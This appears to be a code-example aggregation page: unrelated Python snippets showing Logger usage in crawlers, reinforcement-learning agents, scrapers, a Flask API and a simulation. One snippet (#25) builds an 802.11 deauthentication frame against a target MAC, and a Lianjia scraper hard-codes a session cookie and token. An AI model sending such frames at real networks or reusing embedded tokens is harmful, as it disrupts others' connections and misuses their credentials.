def boot(self, links):
     for rootlink in links:
         self.rootlink_queue.put(rootlink)
         Logger.write('Put rootlink:', rootlink)
         self.rootlink_queue.join()
         self.sublink_queue.join()
         self.image_queue.join()
 def load_config_file(filename='config_resource.json'):
     Logger.write('Loading config file:', filename)
     with open(filename, 'r', encoding='utf8') as file:
         config_json = json.load(file)
         Logger.write('Load success, content: \n' + json.dumps(config_json))
         file.close()
     return config_json
 def printFib(n):  # write Fibonacci series up to n
     Logger.printStart()
     a, b = 0, 1
     while b < n:
         print(b),
         a, b = b, a + b
     Logger.printOk()
Beispiel #4
0
 def execute(self):
     text = self.form.txtEdit.toPlainText()
     filewriter = FileWriter(self.form.userfile)
     filewriter.open()
     filewriter.writeLine(text)
     filewriter.close()
     logger = Logger()
     logger.log("saveText()")
Beispiel #5
0
    def execute(self):
        reply = QMessageBox.question(self.form, 'Message',
                                     "Are you sure to clear text?",
                                     QMessageBox.Yes | QMessageBox.No,
                                     QMessageBox.No)

        if reply == QMessageBox.Yes:
            self.form.txtEdit.setText('')
            logger = Logger()
            logger.log("clearText()")
Beispiel #6
0
 def execute(self):
     filereader = FileReader(self.form.userfile)
     filereader.open()
     text = ''
     while True:
         temp_str = filereader.readLine()
         if not temp_str:
             break
         text += temp_str
     self.form.txtEdit.setText(text)
     logger = Logger()
     logger.log("readTextFromFile()")
     filereader.close()
Beispiel #7
0
class BaseAgent:

    def __init__(self, env=gym.make('Blackjack-v0'), log_dir=None):
        self._env = env
        self.q = defaultdict(lambda: np.zeros(self._env.action_space.n))
        self.policy = None
        self.eval_policy = None
        self.log_dir = log_dir
        self.logger = Logger(self.log_dir, debug=False)
        # Adding run function to Gym env
        if isinstance(self._env, BlackjackEnv):
            def run(is_training=False):
                observation = self._env.reset()
                while True:
                    if (self.eval_policy is None) or \
                            (observation not in self.eval_policy):
                        action = np.random.choice(
                            np.arange(env.action_space.n))
                    else:
                        action = np.argmax(self.eval_policy[observation])
                    observation, reward, done, _ = self._env.step(action)
                    if done:
                        return _, np.asarray([int(reward)])

            self._env.run = run
            self._env.player_num = 1

    def train(self):
        pass

    def play(self, num_plays=NUM_HANDS):
        return tournament(self._env, num_plays)

    def plot_policy(self, save=False, save_path=None):
        assert self.policy is not None
        plot_policy(self.policy, save=save, save_path=save_path)

    def plot_value_function(self):
        assert self.policy is not None
        plot_value_function(self.q)

    def plot(self, algo_name):
        self.logger.plot(algo_name)

    @staticmethod
    def plot_avg(base_dir, algo_name):
        csv_path_list = [f"{base_dir}/{j}/performance.csv" for j in
                         range(NUM_EXP)]
        label_names = [f"{algo_name}_{j}" for j in range(NUM_EXP)]
        plot_avg(csv_path_list, label_names, f"{algo_name}_Average",
                 f"{base_dir}/avg_fig.png")
Beispiel #8
0
class DBHandler:
    def __init__(self):
        self.logger = Logger(logname="/var/log/houseData.log", loglevel=1, logger="houseDataLogger").getLogger()

    def get_db_conn(self, db_name, user_name, password):
        conn = None
        try:
            conn = MySQLdb.connect(
                host="localhost", user=user_name, passwd=password, db=db_name, port=3306, charset="utf8"
            )
            return conn
        except MySQLdb.Error, e:
            self.logger.error("Mysql Error %d: %s" % (e.args[0], e.args[1]))
            sys.exit(-1)
class Audio(object):
  def __init__(self, 
      verbose=False, 
      log_output="stderr",
      **kwargs):
    
    self._verbose = verbose
    self._logger = Logger(log_output=log_output, role=self.__class__.__name__)
    self._time_str = str(int(time.time()));
   
  def log(self, m, header_color="", color=""):
    self._logger.log(m, header_color=header_color, color=color, time_str=self._time_str)

  def _reset_term(self, dummy_a, dummy_b):
        call(["reset", "-I"]);
 def __init__(self, type, apache_id):
     self.type = type
     self.apache_id = str(apache_id)
     self.full_id = self.type.upper() + '-' + self.apache_id
     self.url = 'https://issues.apache.org/jira/browse/' + self.full_id
     self.data = "" 
     self.logger = Logger(__name__)
Beispiel #11
0
    def grab(path, image_url, file_name=None):
        try:
            if not file_name:
                file_name = image_url.split('/')[-1]
            response = requests.get(image_url)
            content_type = response.headers['content-type']

            if content_type not in ImageLoader.ALLOWED_TYPES:
                return False
            prefix = content_type.split('/')[-1]
            file_name = '%s.%s' % (file_name, prefix)
            file_path = os.path.join(path, file_name)

            write_file(file_path, response.content)
        except exceptions.RequestException as error:
            Logger.record_log('Occurred Exception:', error)
Beispiel #12
0
    def __init__(self, os_properties):
        # Read OS properties
        self.os_properties = os_properties
        micropython.alloc_emergency_exception_buf(100)

        # Logger
        self.logger = Logger(self.os_properties['log_level'])
Beispiel #13
0
    def run(self):
        stepSize = self.step_size()
        print "using stepSize: " + str(stepSize)

        folderStruct = self.__folderStruct
        # velocityDetector = VelocityDetectorMultiThreaded(folderStruct)
        # videoStream = VideoStreamMultiThreaded(folderStruct.getVideoFilepath())

        if not folderStruct.fileExists(folderStruct.getRawDriftsFilepath()):
            self.__createNewRawFileWithHeaderRow(folderStruct)

        logger = Logger.openInAppendMode(folderStruct.getRawDriftsFilepath())

        rawDriftData = DriftRawData(folderStruct)
        maxFrameID = rawDriftData.maxFrameID()
        if maxFrameID > 1:
            startFrameID = maxFrameID + stepSize
        else:
            startFrameID = 5

        #cv2.startWindowThread()
        #imageWin = ImageWindow("mainWithRedDots", Point(700, 200))

        print("starting processing from frame", startFrameID)

        velocityDetector = VelocityDetector()
        videoStream = VideoStream(folderStruct.getVideoFilepath())
        velocityDetector.runLoop(startFrameID, stepSize, logger, videoStream)

        logger.closeFile()
  def __init__(self, 
      audio_player=AUDIO_PLAYER, 
      pdf_viewer=PDF_VIEWER, 
      output_directory=OUTPUT_DIR, 
      tmp_directory=TMP_DIRECTORY,
      clean=False,
      verbose=False, 
      log_output="stderr",
      **kwargs):
    
    self._verbose = verbose
    self._logger = Logger(log_output=log_output, role=self.__class__.__name__)
    self._time_str = str(int(time.time()));

 
    self.audio_player = audio_player
    self.pdf_viewer = pdf_viewer
    self.output_directory = output_directory
    self.tmp_directory = TMP_DIRECTORY
    if not os.path.isdir(self.output_directory):
      try:
        os.mkdir(self.output_directory)
      except OSError as e:
        self.log("The path {} already exists.\n"
          "Clear that path or specify a different directory name.".format(self.output_directory)
        )
    if clean:
      self.filename_clean() #for debugging
class LianjiaHisStatisticsData:
	def __init__(self):
		self.logger = Logger(logname='/var/log/houseData.log', loglevel=1, logger="houseDataLogger").getLogger()

	def get_response(self, url):
		# add header to avoid get 403 fobbiden message
		i_headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:41.0) Gecko/20100101 Firefox/41.0'}
		request = urllib2.Request(url, headers = i_headers)

		try:
			response = urllib2.urlopen(request)
		except Exception, e:
			self.logger.error(str(e) + '\n')
			return None

		return response
Beispiel #16
0
    def __createNewRawFileWithHeaderRow(self, folderStruct):
        driftsFileHeaderRow = VelocityDetector.infoHeaders()

        logger = Logger.openInOverwriteMode(
            folderStruct.getRawDriftsFilepath())
        logger.writeToFile(driftsFileHeaderRow)
        logger.closeFile()
 def __init__(self, 
     verbose=False, 
     log_output="stderr",
     **kwargs):
   
   self._verbose = verbose
   self._logger = Logger(log_output=log_output, role=self.__class__.__name__)
   self._time_str = str(int(time.time()));
    def __init__(self, type):
        self.lines = {}
        logger = Logger(__name__)

        files = glob.glob("data/" + type.upper() + "/*")

        for file in files:
            logger.debug("Loading JIRA: " + file)
            self.lines[file] = []
            with open(file, 'r') as f:
                lines = []
                for line in f:
                    if line.find('Caused by') >= 0 or line.find('ERROR') >= 0:
                        lines.append(line.strip())

                self.lines[file] = lines
                logger.debug("JIRA: %s loaded with %s lines", file, str(len(lines)))
Beispiel #19
0
	def __init__(self, name, ticker, period, live_mode, periods_needed=200):
		"""
		- name: string, the name of the bot
		- ticker: string, the ticker formatted like that: ASSET1/ASSET2
		- period: string, the period on which the loop will be set, and the resolution of the candles
		- live_mode: bool, should we launch the live loop and start trading live
		- periods_needed: int, the number of candles you will get every loop, optional
		"""
		self.live_mode = live_mode
		self.name = name
		self.ticker = ticker
		self.period_text = period
		self.periods_needed = periods_needed
		self.offset_seconds = 10
		if (not self.name in config.get_config()):
			print("❌ Cannot instantiate bot: no config entry")
			exit(1)
		self.config = config.get_config()[self.name]
		if (not "capitalAllowed" in self.config):
			print("❌ Cannot instantiate bot: no 'capitalAllowed' property")
			exit(1)
		try:
			self.logger = Logger(self.name, live_mode)
		except:
			print("❌ Cannot connect to the log DB, are you sure it's running?")
			raise
		if (self.live_mode):
			self.data = Data(self.name)
		else:
			self.data = Data(self.name + "-test")
		self.exchange = Exchange(self.logger, self.data, self.config['capitalAllowed'], live_mode, self.ticker, self.period_text)
		try:
			self.period = period_matching[period]
		except:
			print("Available periods: 1m, 3m, 5m, 15m, 30m, 1h, 2h, 3h, 4h, 1d, 1w")
			raise
		self.logger.log("ℹ️", f"Bot {self.name} started with a period of {period}")
		self.logger.log("ℹ️", f"Capital allowed: {self.config['capitalAllowed']}%")
		self.setup()
		if (self.live_mode):
			self.preloop()
Beispiel #20
0
 def __init__(self, env):
     """
     Parameters
     ----------
     env : str
         the environment that the current instance is running
     """
     print("[ENDPOINTS] Initializing...")
     # initialize libraries
     self._env = env
     self._db = DB(self._env, self._workers)
     self._logger = Logger(self._db, self._env)
     self._crypto = Crypto()
     # initialize Flask
     self._app = Flask(__name__)
     self._app.json_encoder = CustomJSONEncoder
     self._api = Api(self._app)
     self._app.before_request(self.detectAuthorization)
     self._app.after_request(self.finishRequest)
     for url in self._endpoints: self.addResource(self._endpoints[url], url)
     print("[ENDPOINTS] Done.")
Beispiel #21
0
    def __init__(self, env=gym.make('Blackjack-v0'), log_dir=None):
        self._env = env
        self.q = defaultdict(lambda: np.zeros(self._env.action_space.n))
        self.policy = None
        self.eval_policy = None
        self.log_dir = log_dir
        self.logger = Logger(self.log_dir, debug=False)
        # Adding run function to Gym env
        if isinstance(self._env, BlackjackEnv):
            def run(is_training=False):
                observation = self._env.reset()
                while True:
                    if (self.eval_policy is None) or \
                            (observation not in self.eval_policy):
                        action = np.random.choice(
                            np.arange(env.action_space.n))
                    else:
                        action = np.argmax(self.eval_policy[observation])
                    observation, reward, done, _ = self._env.step(action)
                    if done:
                        return _, np.asarray([int(reward)])

            self._env.run = run
            self._env.player_num = 1
Beispiel #22
0
def dqn_run_experiments():
    for i in range(NUM_EXP):
        # Make environment
        env = rlcard.make('blackjack', config={'seed': i})
        eval_env = rlcard.make('blackjack', config={'seed': i})

        # Set the iterations numbers and how frequently we evaluate/save plot

        # The initial memory size
        memory_init_size = 100

        # Train the agent every X steps
        train_every = 1

        # The paths for saving the logs and learning curves
        log_dir = f"{DQN_RES_DIR}/{i}"

        # Set up the agents
        agent = DQNAgent('dqn',
                         action_num=env.action_num,
                         replay_memory_init_size=memory_init_size,
                         train_every=train_every,
                         state_shape=env.state_shape,
                         mlp_layers=[128, 256, 512],
                         debug=True)
        env.set_agents([agent])
        eval_env.set_agents([agent])


        # Init a Logger to plot the learning curve
        logger = Logger(log_dir, debug=True)

        for episode in range(DQN_TRAINING_DURATION):

            # Generate data from the environment
            trajectories, _ = env.run(is_training=True)

            # Feed transitions into agent memory, and train the agent
            for ts in trajectories[0]:
                agent.feed(ts)

            # Evaluate the performance. Play with random agents.
            if episode % EVALUATE_EVERY == 0:
                logger.log_performance(env.timestep, tournament(eval_env, EVALUATE_NUM_OF_HANDS)[0])

            # Close files in the logger
            # logger.close_files()

        # Plot the learning curve
        logger.plot(f"DQN_{i}")
    BaseAgent.plot_avg(DQN_RES_DIR, "DQN")
    def __init__(self):
        """
            Initializes and sets required default global variables by
            collecting metadata from information.yaml
        """
        self.ru_yaml = YAML()
        self.ru_yaml.width = 4096
        self.logger_object = Logger()
        self.webex_wrapper = WebexNotifierWrapper()
        self.logger = logging.getLogger('chatbot_logger')
        self.logger.info("Starting default initialization...")
        self.webex_auth_headers = {'content-type': 'application/json'}
        try:
            # Collecting metadata from information.yaml
            with open('information.yaml', 'r') as ifh:
                self.doc = yaml.safe_load(ifh)

                # Getting Webex Teams Room details
                self.webex_url = str(
                    self.doc["webex_teams_details"]["webex_url"])
                self.webex_room_id = str(
                    self.doc["webex_teams_details"]["webex_room_id"])

                # Getting Webex Teams Bot details
                self.auth_token = str(
                    self.doc["webex_teams_details"]["auth_token"])
                self.webex_bot_name = str(
                    self.doc["webex_teams_details"]["webex_bot_name"])

            # Setting Webex connectivity parameters
            self.webex_auth_headers[
                'authorization'] = 'Bearer ' + self.auth_token
            self.webex_auth_headers['Accept'] = 'application/json'
            # Removing '+ "&max=1"' for now from webex_teams_get_url bcoz of
            # the webex list messages API issue -- including max parameter
            # impacts the sort order of the message results when bot calls
            # list messages api
            self.webex_teams_get_url = self.webex_url + "?mentionedPeople=me" \
                                       + "&roomId=" + self.webex_room_id

            self.logger.info("Default initialization complete!!!")
        except Exception as e:
            self.logger.error("Error -- {}".format(e))
#!/usr/bin/env python
# encoding: utf-8

import common
from lib.Logger import Logger
from lib.Config import Config
from lib.PTT import PTT

logger = Logger('h4_invitation_notifier_ptt').__new__()

config = Config()
ID = config['bbs']['user']
PASSWORD = config['bbs']['pass']
PartyDate = common.thisThursday()

board = 'Linux'
subject = 'HackingThursday 固定聚會 (%s)' % PartyDate
content = common.html2txt(common.get_wikidot_content_body('http://www.hackingthursday.org/invite'))

if __name__ == '__main__':
    ptt = PTT()

    if ptt.login(ID, PASSWORD):
        logger.info('login ptt')

    if ptt.enter(board):
        logger.info('enter %s board' % board)

    if ptt.post(subject, content):
        logger.info('post article')
Beispiel #25
0
 def getDeauthFrame(ap, target):
     Logger.log('Sending deauh from {} to {}'.format(ap.mac, target.mac))
     deauth_frame = struct.pack('!H', 1)
     return Radiotap802_11.getRadiotapHeader() + Deauth.getDot11(
         ap.mac, target.mac) + deauth_frame
#!/usr/bin/env python
# encoding: utf-8

import common
from lib.Logger import Logger
from lib.Config import Config
from lib.Facebook import Facebook, Graph

logger = Logger('h4_create_fb_event').__new__()

config = Config()
username = config['facebook']['username']
password = config['facebook']['password']
facebook_group_id = config['facebook']['group_id']

this_thursday = common.thisThursday()
title = 'HackingThursday固定聚會(%s)' % this_thursday
description = "地點:伯朗咖啡 (建國店)\n地址:台北市大安區建國南路一段 166 號\n(捷運忠孝新生站三號出口,沿忠孝東路走至建國南路右轉)\n\nWhat you can do in H4 :\n1. Code your code.\n2. Talk about OS, Programming, Hacking skills, Gossiping ...\n3. Meet new friends ~\n4. Hack and share anything !\n\nSee details :\nhttp://www.hackingthursday.org/\n\nWeekly Share :\nhttp://sync.in/h4"
start_time = '%sT07:30:00-0400' % this_thursday
end_time = '%sT10:00:00-0400' % this_thursday


def check_token():
    graph = Graph(config['facebook']['access_token'])

    if graph.getUID():
        logger.info('valid token')
        return config['facebook']['access_token']
    else:
        logger.info('invalid token, try get new one')
        fb = Facebook()
class ApacheJiraParser:
    def __init__(self, type, apache_id):
        self.type = type
        self.apache_id = str(apache_id)
        self.full_id = self.type.upper() + '-' + self.apache_id
        self.url = 'https://issues.apache.org/jira/browse/' + self.full_id
        self.data = "" 
        self.logger = Logger(__name__)

    def parse(self):
        self.logger.info("Retrieving JIRA: %s", self.url)

        buffer = StringIO()
        c = pycurl.Curl()
        c.setopt(c.URL, self.url)
        c.setopt(c.WRITEFUNCTION, buffer.write)
        c.perform()
        c.close()
        
        content = str(
            BeautifulSoup(
                buffer.getvalue(),
            'html.parser'
            ).find(id='descriptionmodule')
        )
        self.logger.info("JIRA retrieved")
        
        if content is None or content == 'None' or content.strip() == "":
            self.logger.info('No description was found for ID: %s', self.full_id)
        elif re.search(".*Exception.*", content) is None and re.search(".*Caused by.*", content) is None:
            self.logger.info('No Exception or Cause By found for ID: %s', self.full_id)
        else:
            # strip HTML tags
            tag_re = re.compile(r'(<!--.*?-->|<[^>]*>)')
            self.data = cgi.escape(tag_re.sub('', content))
            self.logger.info("Striping HTML tags")

        return self

    def write(self):
        if not self.data:
            self.logger.info('No data was found for ID: %s, skipping writing file..', self.full_id)
            return

        text_file = open("data/" + self.type.lower() + '/' + self.full_id, "w")
        text_file.write(self.data)
        text_file.close()
Beispiel #28
0
#!/usr/bin/env python
# author: samren
import logging
import traceback
import unittest
import HTMLTestRunner
import time
from lib.Logger import Logger
from testcases.cases_login_logout.admin_login_logout import Bugfree管理员登录退出

if __name__ == '__main__':
    logger = Logger('./log/logger.log', logging.INFO)
    logging.info("本次测试开始执行,以下是详细日志")
    try:
        suite = unittest.TestSuite()  # 新建一个suite,测试套件
        loader = unittest.TestLoader()  # 新建一个加载器,自定义的方式把测试用例加载到suite里
        suite.addTests(loader.loadTestsFromTestCase(
            Bugfree管理员登录退出))  # 把测试类所有的方法都加载到suite里
        # unittest.TextTestRunner(verbosity=2).run(suite) # unittest运行suite
        fp = open(
            'reports/report_bugfree_{0}.html'.format(
                time.strftime("%Y-%m-%d %H-%M-%S")), 'wb')
        runner = HTMLTestRunner.HTMLTestRunner(
            stream=fp, title='Bugfree的测试报告', description='Bugfree的所有测试用例执行细节')
        runner.run(suite)
        logging.info("测试顺利结束^_^ ")
    except Exception:
        """print_exc() 把异常输出到屏幕上,而format_exc() 把异常返回成字符串"""
        traceback.print_exc()
        logging.error(traceback.format_exc())
        logging.error("测试异常终止")
Beispiel #29
0
class LianjiaDealData:
	def __init__(self):
		self.logger = Logger(logname='/var/log/houseData.log', loglevel=1, logger="houseDataLogger").getLogger()

	'''
	set the cell style
	'''
	def set_style(self, name,height,bold=False):
		# init style
		style = xlwt.XFStyle()

		# create font for style
		font = xlwt.Font()
		font.name = name # 'Times New Roman'
		font.size = 10
		#font.bold = bold
		font.color_index = 4
		font.height = height

		# borders= xlwt.Borders()
		# borders.left= 6
		# borders.right= 6
		# borders.top= 6
		# borders.bottom= 6

		style.font = font
		# style.borders = borders

		return style

	def get_deal_data(self, soup):
		# row index
		n = 0
		# tunple for values to insert db
		values = []

		for item_name in soup.findAll('div', {'class': 'info-panel'}):
			self.logger.info('Collecting %s row' % n)
			# str index
			j = 0
			# cloumn index
			m = 0
			# flag for data from other agent
			f = False
			# array to get the column value
			arr = (2, 8, 11)
			# len of item_name.strings
			k = 0
			for str in item_name.strings:
				k = k + 1

			if k < 14:
				arr = (k-6, k-3)

			value = []
			for str in item_name.strings:
				if j == 0:
					tmp = str.split(' ')
					l = 0;
					while l < len(tmp):
						# 71平米 --> 71
						if l == 2:
							value.append(re.sub('\D', '', tmp[l]))
						else:
							value.append(tmp[l])
						# update column index to next column
						m = m + 1
						l = l + 1
				elif j == 1 and str == u'历史成交,暂无详情页':
					f = True
					arr = (k-6, k-3)
				elif j == 1 or (j == 2 and f):
					tmp = str.split('/')
					l = 0;
					while l < len(tmp) - 1:
						value.append(tmp[l])
						# update column index to next column
						m = m + 1
						l = l + 1
					if f:
						value.append('')
						m = m + 1
				elif j == 2 and k < 14:
					value.append('')
					m = m + 1
				elif j == k - 8:
					if len(str) == 7:
						str = str + '.01'

					value.append(str)
					m = m + 1
				elif j in arr:
					value.append(str)
					# update column index to next column
					m = m + 1
				# update str index to next column
				j = j + 1
			if len(value) == 9:
				values.append(value)
			# update row index to the next row
			n = n + 1
		self.logger.info('%s rows data has been collected; the length of list stores the collected data is %s' % (n, len(values)))
		self.logger.info('the collected data is: %s' % values)

		return values

	def get_response(self, url):
		# add header to avoid get 403 fobbiden message
		i_headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:41.0) Gecko/20100101 Firefox/41.0',
					'Cookie': 'lianjia_uuid=2ebbfb89-6086-41ba-8c8b-06299a4ef5c8; lianjia_token=1.0092e5f86f1e8105f63d6d6fd4d79d9738'}
		request = urllib2.Request(url, headers = i_headers)

		try:
			response = urllib2.urlopen(request)
		except Exception, e:
			sys.stderr.write(str(e) + '\n')
			return None

		return response
Beispiel #30
0
    def simulation():
        """
        Function to install handlers on the /simulation path. This allows for
        requesting simulation data or starting a new simulation.

        Parameters
        ----------
        POST:

            servers: list
                List containing configurations for a server pool as dicts.
                { capacity: int, size: int, kind: string }
                For example, { size: 10, capacity: 10, kind: 'regular' }.

            process: list
                List specifying how a process should go (from server to server).
                This should contain a sequence of server kinds.
                For example, ["regular", "balance", "pay"].

            runtime: int
                Runtime of the simulation (defined by simpy package).

        Returns
        -------
        GET: dict
        POST: int
        """
        if request.method == "POST":

            # nonlocal use of the simulation count
            nonlocal simc

            # increment the simulation count
            simc += 1

            # we need a new environment which we can run.
            environment = Environment()

            # we need a server pool
            servers = MultiServers()

            # iterate over all of the servers that need to be configured that
            # we received from the client
            for kind in request.form['kinds'].split(','):

                # append a new server pool to the multiserver system
                servers.append(
                    Servers(environment,
                            size=int(request.form['size']),
                            capacity=int(request.form['capacity']),
                            kind=kind.strip()))

            # Get the current date and time to append to the logger file name
            log_timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M")

            # now that we have an output dir, we can construct our logger which
            # we can use for the simulation
            name = "{0}_{1:04d}_{2}".format(file_prefix, simc, log_timestamp)
            logger = Logger(name, directory=LOG_PATH)

            # we also need a logger for all error events that happen in the simulation
            error_logger = Logger(f"error-{name}", directory=LOG_PATH)

            # Enter first line for correct .csv headers
            logger.info(
                'Time;Server;Message_type;CPU Usage;Memory Usage;Latency;Transaction_ID;To_Server;Message'
            )
            error_logger.info('Time;Server;Error type;Start-Stop')

            # we can use the logger for the simulation, so we know where all logs will be written
            environment.logger(logger)
            environment.logger(error_logger, type="error")

            # we need a new form of seasonality
            seasonality = Seasonality(
                join(Seasonality_folder, Seasonality_file),
                max_volume=int(request.form['max_volume']))

            # now, we can put the process in the simulation
            Processor(environment,
                      servers,
                      seasonality=seasonality,
                      kinds=[
                          kind.strip()
                          for kind in request.form['process'].split(',')
                      ])

            # run the simulation with a certain runtime (runtime). this runtime is not equivalent
            # to the current time (measurements). this should be the seasonality of the system.
            # for example, day or week.
            environment.run(until=int(request.form['runtime']))

            # expose the id of the simulation
            return jsonify(simc)

        if request.method == "GET":

            if 'id' in request.args:
                logfile_id = "{:04d}".format(int(request.args.get('id')))

            # Scan the logfile directory
            list_of_files = glob.glob(os.path.join(LOG_PATH, 'log_*.csv'))

            # Return only the filename to get no errors with old functions
            log_filenames = [
                os.path.basename(filename) for filename in list_of_files
            ]

            if log_filenames:

                logfile_ids = [f.split('_')[1] for f in log_filenames]
                name_id_dict = dict(zip(logfile_ids, log_filenames))

                if logfile_id in logfile_ids:
                    # Logfile associated to given ID was successfully found
                    return jsonify({
                        "data": name_id_dict[logfile_id],
                        "message": "success"
                    })

                else:
                    # No logfile associated to given ID was found
                    return jsonify(
                        {"message": "No logfile (.csv) with given ID exists."})
            else:
                # No logfiles found (/logs is empty)
                return jsonify({"message": "No logfiles were found in /logs."})
import os, sys
from lib.HadoopBugDetector import HadoopBugDetector
from lib.ApacheJiraLoader import ApacheJiraLoader
from lib.Logger import Logger

logger = Logger(__name__)

supported_types = ["hive", "impala", "hdfs", "hbase"]
help_text = "Run command as:\n\n" \
            "python bug-detector.py <log_filename> <type>\n" \
            "where <type> is one of the following: " + ", ".join(supported_types) + "\n"

if len(sys.argv) != 3:
    print "Expecting exactly two parameters\n"
    print help_text
    exit(1)

filename = sys.argv[1]
type = sys.argv[2]

if not os.path.isfile(filename):
    logger.error("File: %s does not exist", filename)
    exit(1)

detector = HadoopBugDetector(filename, ApacheJiraLoader(type))
detector.detect()

if len(detector.matchedJira) > 0:
    print "\n".join(detector.matchedJira)
else:
    print "No bugs detected"
Beispiel #32
0
class API:
    """ The Endpoints class

    Initializes the API portion of Bifrost. Also, takes care of authorizations.

    Attributes
    ----------
    _endpoints : dict
        the endpoint with the associated classes
    _version : str
        current version that the API runs on
    _logger : Logger
        the logger object for keeping track of traffic
    _db : DB
        the DB object for DB interfaces
    """

    _endpoints = conf._endpoints
    _protected = conf._protected
    _workers = conf._workers

    _version = "v0"
    _logger = None
    _db = None
    _crypto = None
    _env = ""

    # --------------------------------------------------------------------------
    def __init__(self, env):
        """
        Parameters
        ----------
        env : str
            the environment that the current instance is running
        """
        print("[ENDPOINTS] Initializing...")
        # initialize libraries
        self._env = env
        self._db = DB(self._env, self._workers)
        self._logger = Logger(self._db, self._env)
        self._crypto = Crypto()
        # initialize Flask
        self._app = Flask(__name__)
        self._app.json_encoder = CustomJSONEncoder
        self._api = Api(self._app)
        self._app.before_request(self.detectAuthorization)
        self._app.after_request(self.finishRequest)
        for url in self._endpoints: self.addResource(self._endpoints[url], url)
        print("[ENDPOINTS] Done.")

    # --------------------------------------------------------------------------
    def getApp(self):
        """ Return Flask app

        AWS requires a Elastic Beanstalk app to be an executable app. As for now
        this works.

        Returns
        -------
        Flask
            the flask application for AWS
        """

        return self._app

    # --------------------------------------------------------------------------
    def logRequests(self, rtype, request):
        """ Prepare log messages

        Prepare the messages that we want and use Logger to save them to disk, or
        send a notification.

        Parameters
        ----------
        rtype : int
            response type
        request : Request
            request object that was generated by Flask
        """

        status = "NORMAL"
        if rtype == 404 or rtype == 500: status = "CRITICAL"
        elif rtype == 401: status = "NOAUTH"

        self._logger.log(
            "endpoints", json.dumps({
                "rtype": str(rtype),
                "path": request.path,
                "data": request.data.decode("utf8"),
                "args": request.args.to_dict(),
                "method": request.method,
                "remote_addr": request.remote_addr,
                "headers": request.headers.to_list()
            }), status=status
        )

    # --------------------------------------------------------------------------
    def sendAuthorizationError(self, message, token):
        """ Create the authorization error message

        Generates a error message that is used multiple times in the code.

        Parameters
        ----------
        message : str
            message to be sent
        token : str
            the token that was used in the request

        Returns
        -------
        str
            the returning JSON response as a string
        int
            HTTP response code
        """

        return (json.dumps({ "error":message }), 401)

    # --------------------------------------------------------------------------
    def isValid(self, session, patient_id):
        """ Check if token is valid

        Uses DB to check if the given token is existing and acive. The `active`
        flag in the DB can hence be used to quickly deactivate a token.

        Parameters
        ----------
        session : str
            the token that was used in the request
        patient_id : str
            the patient ID that was sent with the request

        Returns
        -------
        bool
            IF valid => True, ELSE False
        str
            the patient_id of the user associated with the session
        dict
            the full session dict containing all the information loaded from DB
        """

        # check if token set;
        try:
            if session == "" or patient_id == "":
                return False, "", {}

            session = self._db.getSession(session)
            if session["patient_id"] != patient_id: return False, "", {}
        except:
            return False, "", {}

        return True, session["patient_id"], session

    # --------------------------------------------------------------------------
    def detectAuthorization(self):
        """ Check if authorization is valid

        Uses the Flask request to check the header. The `Bearer` header must be
        present and name a valid session_id. Specifically, the function looks for
        the `Authorization: Bearer [SESSION]` header (note the exact format). Finally,
        the function adds `patient_id` and `session` to the request object, to make this
        information available to the system.
        """
        request_path = request.path[len(self._version)+1:]
        header = request.headers.get("Authorization")

        if request_path in self._protected and request.method in self._protected[request_path]:

            header = request.headers.get("Authorization")
            if not header:
                return self.sendAuthorizationError("Invalid header. Request registered.", "")
            # bearer or token not set;
            outs = header.split()
            if len(outs) != 2:
                return self.sendAuthorizationError("Invalid authentication. Request registered.", "")
            bearer, session = outs
            auth, patient_id, obj = self.isValid(session, request.headers.get("Patient"))
            if bearer != "Bearer" or not auth:
                return self.sendAuthorizationError("Invalid authentication. Request registered.", session)

            request.patient_id = patient_id
            request.session = session
            request.obj = obj

    # --------------------------------------------------------------------------
    def finishRequest(self, response):
        """ Hook for after response has been prepared

        This function logs the response.

        Parameters
        ----------
        response : Response
            Response object for Flask

        Returns
        -------
        response : Response
            Response object for Flask
        """

        response.headers["Access-Control-Allow-Origin"] = "*"
        response.headers["Access-Control-Allow-Headers"] = "Authorization,Patient"
        self.logRequests(response.status_code, request)
        return response

    # --------------------------------------------------------------------------
    def addResource(self, obj, url):
        """ Add resources to flask_restful

        Injects the API with the endpoints that are given in the `_endpoints`
        attribute.

        Parameters
        ----------
        obj : flask_restful.Resource
            class to inject
        url : str
            Flask formatted endpoint
        """

        print("[ADDED ROUTE]", "/"+self._version+url)
        self._api.add_resource(
            obj, 
            "/"+self._version+url, 
            resource_class_kwargs={
                "logger":self._logger,
                "db":self._db,
                "crypto": self._crypto,
                "workers": self._workers,
                "request_string": "/"+self._version+url
            }
        )
Beispiel #33
0
def main(n, config, seasonality, log_dir, log_prefix):
    """
    Main loop that runs a simulation. This simulation can be configured by passing
    a configuration dictionary, and specifying where all logs will be written to.

    Parameters
    ----------
    n: int
        The Nth simulation.
    config: dict
        Configuration for the simulation. Should contain the following keys:
        - servers:      List of dictionaries, describing a server pool.
        - process:      Sequence of kinds of servers, describing how a process within
                        the simulation runs.
        - runtime:      Until when the simulation should run.
        - max_volumne:  Maximum number of events.
    seasonality: Seasonality
        Seasonality object to use for the simulation. This defines the intervals
        between events.
    log_dir: string
        Path pointing to where all logs should be written.
    log_prefix: string
        Prefix of every log file.

    Returns
    -------
    bool
    """
    # we need a new environment which we can run.
    environment = Environment()

    # we need a server pool
    servers = MultiServers()

    # iterate over all of the servers that need to be configured that
    # we received from the client
    for server in config['servers']:

        # append a new server pool to the multiserver system
        servers.append(
            Servers(environment,
                    size=server['size'],
                    capacity=server['capacity'],
                    kind=server['kind']))

    # we need a logger that will log all events that happen in the simulation
    name = "{0}_{1:04d}_{2}".format(log_prefix, n,
                                    datetime.now().strftime("%Y-%m-%d_%H-%M"))
    logger = Logger(name, directory=log_dir, show_stdout=False, usequeue=False)

    # we also need a logger for all error events that happen in the simulation
    error_logger = Logger(f"error-{name}",
                          directory=log_dir,
                          show_stdout=False)

    # Start QueueListener
    if hasattr(logger, "listener"):
        logger.listener.start()

    # Enter first line for correct .csv headers
    logger.log(
        'Time;Server;Message_type;CPU Usage;Memory Usage;Latency;Transaction_ID;To_Server;Message'
    )
    error_logger.log('Time;Server;Error type;Start-Stop')

    # we can use the logger for the simulation, so we know where all logs will be written
    environment.logger(logger)
    environment.logger(error_logger, type="error")

    # we need a new form of seasonality
    seasonality = Seasonality(seasonality, max_volume=config["max_volume"])

    # now, we can put the process in the simulation
    Processor(environment,
              servers,
